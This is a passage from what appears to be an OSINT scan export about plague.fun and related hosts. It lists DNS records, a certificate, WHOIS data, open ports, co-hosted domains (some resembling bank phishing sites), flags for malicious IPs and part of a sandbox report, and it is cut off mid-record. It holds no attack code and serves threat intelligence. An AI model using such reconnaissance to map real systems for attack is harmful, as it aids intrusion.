"2022-12-04T17:22:49.041282427Z"}, "portgenpill.tk": {"record_type": "A", "resolved_at": "2022-12-08T13:39:15.894610809Z"}, "webdisk.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-02T12:18:13.327934825Z"}, "batonrougekennelclub.com": {"record_type": "A", "resolved_at": "2022-12-10T13:03:00.468363640Z"}, "thenheppsinforddantca.tk": {"record_type": "A", "resolved_at": "2022-12-09T16:45:26.377109728Z"}, "cpanel.protipsnetbd.com": {"record_type": "A", "resolved_at": "2022-10-29T18:59:35.908349611Z"}, "tticarotliesan.ml": {"record_type": "A", "resolved_at": "2022-11-19T15:09:51.128787748Z"}, "steelischerosendie.tk": {"record_type": "A", "resolved_at": "2022-12-04T17:23:44.321932394Z"}, "www.hookup.directory": {"record_type": "A", "resolved_at": "2022-12-14T15:00:30.848178149Z"}, "meovanew.tk": {"record_type": "A", "resolved_at": "2022-12-14T17:42:19.596891632Z"}, "www.batonrougekennelclub.com": {"record_type": "A", "resolved_at": 
"2022-12-04T13:07:52.965809462Z"}, "en.sapnemedekhna.com": {"record_type": "A", "resolved_at": "2022-12-06T14:21:24.557280221Z"}, "ciastaracabla.tk": {"record_type": "A", "resolved_at": "2022-11-29T16:58:12.923085066Z"}, "clutuniphitan.tk": {"record_type": "A", "resolved_at": "2022-12-12T21:11:40.460069897Z"}, "hjnjq.com": {"record_type": "A", "resolved_at": "2022-11-16T13:27:49.652192119Z"}, "chiatreshatcompca.ml": {"record_type": "A", "resolved_at": "2022-11-30T15:25:54.873155159Z"}, "banadislifo.tk": {"record_type": "A", "resolved_at": "2022-11-22T16:56:32.784672802Z"}, "fatosbrasil.com.br": {"record_type": "A", "resolved_at": "2022-11-22T12:16:24.488082020Z"}, "blogcast.support": {"record_type": "A", "resolved_at": "2022-12-04T17:20:24.016832384Z"}, "turdadissitedri.ga": {"record_type": "A", "resolved_at": "2022-11-16T14:52:23.820492206Z"}, "ontontocaltersla.tk": {"record_type": "A", "resolved_at": "2022-11-14T16:49:07.690130423Z"}, "www.generalia.online.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-11-26T15:48:18.885099354Z"}, "webdisk.nensi.eu": {"record_type": "A", "resolved_at": "2022-11-13T14:26:06.988304058Z"}, "beeorganic.us": {"record_type": "A", "resolved_at": "2022-11-15T16:26:23.105182582Z"}, "warmodeon.com": {"record_type": "A", "resolved_at": "2022-12-10T14:04:27.488932415Z"}, "gamewinwin.net": {"record_type": "A", "resolved_at": "2022-12-15T16:02:24.221785118Z"}, "webmail.dialectict.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:33:27.083591618Z"}, "tiaronamescio.tk": {"record_type": "A", "resolved_at": "2022-12-16T16:42:57.572866945Z"}, "online-gutschein.net": {"record_type": "A", "resolved_at": "2022-12-13T16:47:04.862884527Z"}, "geolapkimblomid.tk": {"record_type": "A", "resolved_at": "2022-09-28T19:07:16.273366860Z"}, "freelancejobsdb.com": {"record_type": "A", "resolved_at": "2022-11-22T09:21:04.975125532Z"}, "upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-11-29T14:12:38.043402115Z"}, 
"xewapuda.rest": {"record_type": "A", "resolved_at": "2022-10-23T17:07:42.738597699Z"}, "brasfaberk.ga": {"record_type": "A", "resolved_at": "2022-12-12T01:18:17.897930376Z"}, "www.majeronibraces.com": {"record_type": "A", "resolved_at": "2022-11-26T13:38:16.539310269Z"}, "solidnmr.hu": {"record_type": "A", "resolved_at": "2022-12-02T15:08:14.087465067Z"}, "dev.swoop.nl": {"record_type": "A", "resolved_at": "2022-11-16T16:38:55.275899988Z"}, "majeronibraces.com": {"record_type": "A", "resolved_at": "2022-12-16T13:31:16.728181958Z"}, "www.bettingmarket.org": {"record_type": "A", "resolved_at": "2022-12-07T17:08:23.110463705Z"}, "gamedancer.com": {"record_type": "A", "resolved_at": "2022-12-05T13:24:48.451841013Z"}, "hookup.directory": {"record_type": "A", "resolved_at": "2022-12-02T14:51:20.104694579Z"}, "cloudzeroseven.com": {"record_type": "A", "resolved_at": "2022-11-25T13:14:29.278842680Z"}, "www.tipsy.bet": {"record_type": "A", "resolved_at": "2022-12-16T12:12:53.414334751Z"}, "cansundemir.com": {"record_type": "A", "resolved_at": "2022-12-14T13:17:59.610572794Z"}, "ancient-cell-1aa7.2864713421.workers.dev": {"record_type": "A", "resolved_at": "2022-12-14T14:58:25.340932600Z"}, "deedattractiveauthority.quest": {"record_type": "A", "resolved_at": "2022-09-29T22:33:59.901364108Z"}, "www.lovepaper.org.au": {"record_type": "A", "resolved_at": "2022-12-11T12:15:23.828613355Z"}, "halawipga.tk": {"record_type": "A", "resolved_at": "2022-12-09T01:28:34.969228948Z"}, "forgetfulcorn.xyz": {"record_type": "A", "resolved_at": "2022-12-16T16:53:12.007013166Z"}, "www.thedollhousemuseum.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-10-31T16:19:02.095549627Z"}, "www.makecoloradohome.com": {"record_type": "A", "resolved_at": "2022-12-13T13:44:08.455137791Z"}, "promo-pancake.com": {"record_type": "A", "resolved_at": "2022-12-13T14:01:44.599052096Z"}, "mail.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-11-18T12:15:11.721015572Z"}, 
"propdifportfidolo.ml": {"record_type": "A", "resolved_at": "2022-12-11T15:21:35.046116976Z"}, "cpanel.upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-12-14T14:33:07.049345906Z"}, "guelobasagtoppco.tk": {"record_type": "A", "resolved_at": "2022-12-13T17:52:25.676431188Z"}, "fancyacake.net": {"record_type": "A", "resolved_at": "2022-11-30T15:56:40.221799680Z"}, "artopicolma.tk": {"record_type": "A", "resolved_at": "2022-11-19T16:34:56.998683369Z"}, "mindyourbusiness-india.com": {"record_type": "A", "resolved_at": "2022-12-13T13:45:57.533540990Z"}}, "names": ["johnparkeraesthetics.com", "mail.theerathornnft.com", "artopicolma.tk", "tilburg-zonnepaneel.nl", "mulsoftbobarepterp.ga", "www.hookup.directory", "cpcontacts.sectraexpress.com", "mail.batonrougekennelclub.com", "tiaronamescio.tk", "wrisinukilor.tk", "backronseri.gq", "batonrougekennelclub.com", "cpanel.protipsnetbd.com", "deedattractiveauthority.quest", "solidnmr.hu", "fatosbrasil.com.br", "beeorganic.us", "gaseabenzla 104.21.28.240 2022-12-18 00:06:14 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.com plague.fun 2022-12-18 00:05:59 Affiliate - Domain Name No DNS Resolver 2 0 2 0 None registrar-servers.com eforward3.registrar-servers.com 2022-12-18 00:04:00 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: 
b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Apr 9 17:42:21.761 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:76:D4:69:CE:F9:0F:01:E4:95:EB:BC:82: 9C:5E:88:B8:ED:FE:41:18:8A:01:61:3E:CD:29:3B:0B: CE:AB:C1:1C:02:21:00:A5:D9:95:92:02:A2:E8:78:BF: E9:DB:44:85:3B:68:75:11:46:F4:79:52:2F:06:17:34: 06:55:9D:42:97:60:03 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Apr 9 17:42:21.790 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:28:8A:24:C8:BF:19:90:79:23:43: 
21:42:28:0E:AA:BD:D4:96:F1:31:B9:93:FE:C4:6C:5F: F8:49:D9:FE:BF:02:20:6C:E0:5C:5A:F7:9E:25:F9:0E: 56:F8:91:1A:D1:91:FC:A4:00:3A:35:A2:A0:19:F1:A3: AC:69:A7:28:55:78:CE Signature Algorithm: sha256WithRSAEncryption 35:a5:60:e7:22:70:b0:5b:b5:cc:ec:24:6b:fe:a4:b2:b5:d3: 63:87:fc:e1:06:d4:1c:7a:27:66:95:0b:3b:f3:57:c2:47:2e: 0f:bf:2f:47:45:73:38:b4:cf:35:10:df:13:b2:73:e3:5f:17: 1c:d2:43:47:36:d4:6f:4a:b3:42:ed:98:0f:cc:f8:88:ab:f9: 42:42:17:25:8b:39:55:d4:b8:65:63:af:0d:c1:cd:ba:03:81: 81:9e:3c:10:74:65:96:bf:49:2e:75:08:73:44:11:71:54:ff: e8:a4:14:75:7e:37:93:35:7c:5f:07:89:38:3a:c0:4d:37:c3: 39:7b:81:58:97:b7:35:c5:82:6a:0c:99:e8:22:9c:ed:83:3a: 1d:49:2c:1c:9e:56:d5:a3:58:a8:7b:35:e5:27:1b:7a:f3:e2: ca:ff:c2:4e:75:39:9b:36:cd:41:f0:62:d4:27:fc:da:09:3f: fd:4f:c7:98:56:15:c7:60:05:46:59:83:b5:b5:02:66:02:02: 13:75:ac:4b:72:b7:6d:d3:1f:99:78:97:71:3b:f3:8e:07:0b: 82:62:af:3e:67:22:bb:e1:d4:ae:c5:9f:42:ea:98:db:f3:7b: bf:ec:79:68:9a:3a:63:c0:db:58:45:c2:32:72:92:1f:69:2e: 35:6d:26:f6 plague.fun 2022-12-18 00:02:39 Internet Name No SpiderFoot UI 147 0 0 0 None plague.fun plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:03:14 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-99.w90-116.abo.wanadoo.fr 90.116.166.99 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.96.9 2022-12-18 00:10:04 Internet Name - Unresolved No URLScan.io 0 0 1 0 None obf.plague.fun plague.fun 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77b25d2e9a19226e-ORD"]} 188.114.96.0 
2022-12-18 00:25:00 Physical Location No MetaDefender 0 0 1 0 None Amsterdam, Netherlands 40.113.112.131 2022-12-18 00:22:01 Netblock IPv6 Membership No Censys 0 0 2 0 None 2a06:98c1:3121::/48 2a06:98c1:3121::1 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:09:24 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.7:8443 188.114.96.0/24 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 18c34ac2-fa7a-4b78-b7ff-ef204b07e192.id.repl.co 34.149.204.188 2022-12-18 00:02:49 Raw Data from RIRs No Certificate Transparency 6 0 1 0 None plague.fun 2022-12-18 00:13:48 Web Content Language No Language Detector 0 0 3 0 None English 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:09:42 Co-Hosted Site No HackerTarget 0 0 2 0 None aiiasp.com 172.67.147.230 2022-12-18 00:21:51 Open TCP Port No Censys 0 0 2 0 None 172.67.137.37:2095 172.67.137.37 2022-12-18 00:08:59 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.97.0 2022-12-18 00:32:06 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.software plague.fun 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None autoconceitoveiculos.com.br 172.67.147.230 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2053 104.21.19.243 2022-12-18 00:24:02 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.PublicDomainRegistry.com Registrar URL: http://www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:29Z Creation Date: 2000-08-17T10:30:29Z Registry Expiry Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: BIZ.THOROFARE.INFO Name Server: INFO.THOROFARE.BIZ DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:23:45Z <<< For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:30Z Creation Date: 2000-08-17T10:30:29Z Registrar Registration Expiration Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: GDPR Masked Registrant Name: GDPR Masked Registrant Organization: GDPR Masked Registrant Street: GDPR Masked Registrant City: GDPR Masked Registrant State/Province: London Registrant Postal Code: GDPR Masked Registrant Country: GB Registrant Phone: GDPR Masked Registrant Phone Ext: Registrant Fax: GDPR Masked Registrant Fax Ext: Registrant Email: gdpr-masking@gdpr-masked.com Registry Admin ID: GDPR Masked Admin Name: GDPR Masked Admin Organization: GDPR Masked Admin Street: GDPR Masked Admin City: GDPR Masked Admin State/Province: GDPR Masked Admin Postal Code: GDPR Masked Admin Country: GDPR Masked Admin Phone: GDPR Masked Admin Phone Ext: Admin Fax: GDPR Masked Admin Fax Ext: Admin Email: gdpr-masking@gdpr-masked.com Registry Tech ID: GDPR Masked Tech Name: GDPR Masked Tech Organization: GDPR Masked Tech Street: GDPR Masked Tech City: GDPR Masked Tech State/Province: GDPR Masked Tech Postal Code: GDPR Masked Tech Country: GDPR Masked Tech Phone: GDPR Masked Tech Phone Ext: Tech Fax: GDPR Masked Tech Fax Ext: Tech Email: gdpr-masking@gdpr-masked.com Name Server: biz.thorofare.info Name Server: info.thorofare.biz DNSSEC: Unsigned Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:24:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp
plague.net 2022-12-18 00:06:04 Affiliate - Domain Name No DNS Resolver 2 0 2 0 None cloudflare.com garrett.ns.cloudflare.com 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 64 0 1 0 None 172.67.190.129 plague.fun 2022-12-18 00:04:30 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None mail-fr.securemail.pro zerotwo-best-waifu.online 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None serviciosbancpichinchacomecu.ecuador0.repl.co 34.149.204.188 2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.187 34.149.204.188 2022-12-18 00:18:28 Affiliate - Domain Name No DNS Resolver 2 0 3 0 None setupdns.net webmail-fr.setupdns.net 2022-12-18 00:10:04 Raw Data from RIRs No URLScan.io 0 0 1 0 None [{u'sort': [1666956116154, u'38aa66fb-392e-4d9e-b65f-c673218e73c9'], u'task': {u'domain': u'rasputain.fr', u'uuid': u'38aa66fb-392e-4d9e-b65f-c673218e73c9', u'url': u'http://rasputain.fr/', u'visibility': u'public', u'time': u'2022-10-28T11:21:56.154Z', u'apexDomain': u'rasputain.fr', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 180, u'requests': 1, u'dataLength': 27}, u'screenshot': u'https://urlscan.io/screenshots/38aa66fb-392e-4d9e-b65f-c673218e73c9.png', u'result': u'https://urlscan.io/api/v1/result/38aa66fb-392e-4d9e-b65f-c673218e73c9/', u'_id': u'38aa66fb-392e-4d9e-b65f-c673218e73c9', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'rasputain.fr', u'url': u'http://rasputain.fr/', u'ip': u'90.116.166.104', u'asnname': u'France Telecom - Orange, FR', u'server': u'Werkzeug/2.0.3 Python/3.9.0', u'country': u'FR', u'ptr': u'lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr', u'apexDomain': u'rasputain.fr', u'asn': u'AS3215'}}] rasputain.fr 2022-12-18 00:14:29 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.96.3] https://isc.sans.edu/api/ip/188.114.96.3 188.114.96.3 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 
104.21.7.179:2052 104.21.7.179 2022-12-18 00:21:58 Raw Data from RIRs No Censys 0 0 2 0 None 34.149.204.188 2022-12-18 00:21:47 Raw Data from RIRs No Censys 0 0 2 0 None 2606:4700:3032::ac43:8925 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ade072690313ce-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None validarpichincha--ecuadorr.repl.co 34.149.204.188 2022-12-18 00:40:30 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.10] https://www.virustotal.com/en/ip-address/188.114.96.10/information/ 188.114.96.0/24 2022-12-18 00:03:10 SSL Certificate - Issued to No SSL Certificate Analyzer 0 0 1 0 None C=IT,ST=Firenze,O=Register S.p.A.,CN=*.webapps.net zerotwo-best-waifu.online 2022-12-18 00:10:04 Web Server No URLScan.io 0 1 1 0 None Werkzeug/2.2.2 Python/3.8.10 plague.fun 2022-12-18 00:02:48 Co-Hosted Site No CertSpotter 0 0 1 0 None sni.cloudflaressl.com rasputain.fr 2022-12-18 00:32:13 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.tools plague.fun 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": 
"DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b305834e440380-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.178 90.116.149.183 2022-12-18 00:23:32 Raw DNS Records No DNS Raw Records 0 0 2 0 None webmail.zerotwo-best-waifu.online. 900 IN CNAME webmail-fr.setupdns.net. webmail.zerotwo-best-waifu.online 2022-12-18 00:33:43 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.188:8080 195.110.124.0/24 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:8443 172.67.147.230 2022-12-18 00:09:40 Co-Hosted Site No HackerTarget 0 0 2 0 None a-prime-us-credit-cards.zone 172.67.147.230 2022-12-18 00:18:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.20:443 188.114.97.0/24 2022-12-18 00:32:33 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.154:80 195.110.124.0/24 2022-12-18 00:31:32 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.link plague.fun 2022-12-18 00:08:24 Netblock Membership No RIPE 0 0 2 0 None 188.114.96.0/24 188.114.96.1 2022-12-18 00:05:27 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 50, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://loginslink.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': 
u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a3c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_a3c_IESQMMUTEX_0_519"\n "IsoScope_a3c_ConnHashTable<2620>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a3c_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a3c_IE_EarlyTabStart_0xcd8_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_a3c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.179:443"\n "184.30.81.10:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF38.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFFD6.tmp" as clean (type is "data")'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"loginslink.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "urlref_httpsloginslink.com" has type "HTML document UTF-8 Unicode text with CRLF LF line terminators"\n "4K1MNPLT.txt" has type "ASCII text"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"\n "RecoveryStore._74A0AD83-B41D-11EC-B77F-080027424AF0_.dat" has type "Composite Document File V2 Document Cannot read section info"\n "~DFBDEB43A8F9E4B832.TMP" has type "data"\n "TarFF38.tmp" has type "data"\n "~DFEB1F9EF6A4CBFA27.TMP" has type "data"\n "~DF7324F32B2C4302D4.TMP" has type "data"\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"\n "2191DF0A39D0F64EC4B0325ADF87D605" has type "data"\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "V7PST9UP.txt" has type "ASCII text"\n "CabFF27.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "9A5M6R2Y.txt" has type "ASCII text"\n "76IYW2V1.txt" has type "ASCII text"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential 
URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://loginslink.com/"\n Pattern match: "https://loginslink.com"\n Heuristic match: "loginslink.com"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFF27.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "CabFF67.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', 